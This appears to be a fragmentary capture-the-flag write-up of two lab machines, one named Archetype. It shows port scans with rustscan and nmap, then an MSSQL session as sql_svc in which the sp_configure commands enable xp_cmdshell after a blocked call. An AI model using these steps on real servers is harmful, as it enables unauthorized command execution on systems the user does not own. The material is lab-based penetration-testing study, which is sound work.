└─$ rustscan -a 10.129.80.176 --ulimit 5000 ... PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127 # WinRM
└─$ nmap 10.129.80.176 -p 80,5985 -sC -sV ... PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
└─$ rustscan -a 10.129.128.154 --ulimit 5000 PORT STATE SERVICE REASON 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 1433/tcp open ms-sql-s syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127
└─$ nmap 10.129.128.154 -p 135,139,445,1433,5985 -sC -sV PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-ntlm-info: | 10.129.128.154:1433: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 | ms-sql-info: | 10.129.128.154:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-12-11T06:16:46 |_Not valid after: 2054-12-11T06:16:46 |_ssl-date: 2024-12-11T06:28:15+00:00; +1s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-12-10T22:27:59-08:00 |_clock-skew: mean: 1h36m01s, deviation: 3h34m41s, median: 0s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-12-11T06:27:57 |_ start_date: N/A
SQL (ARCHETYPE\sql_svc dbo@master)>EXEC xp_cmdshell 'net user'; ERROR(ARCHETYPE): Line 1: SQL Server blocked access toprocedure'sys.xp_cmdshell'of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of'xp_cmdshell'byusing sp_configure. For more information about enabling 'xp_cmdshell', searchfor'xp_cmdshell'inSQL Server Books Online.
啟用xp_cmdshell
1 2 3 4 5
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; - Enabling the sp_configure as stated in the above error message EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;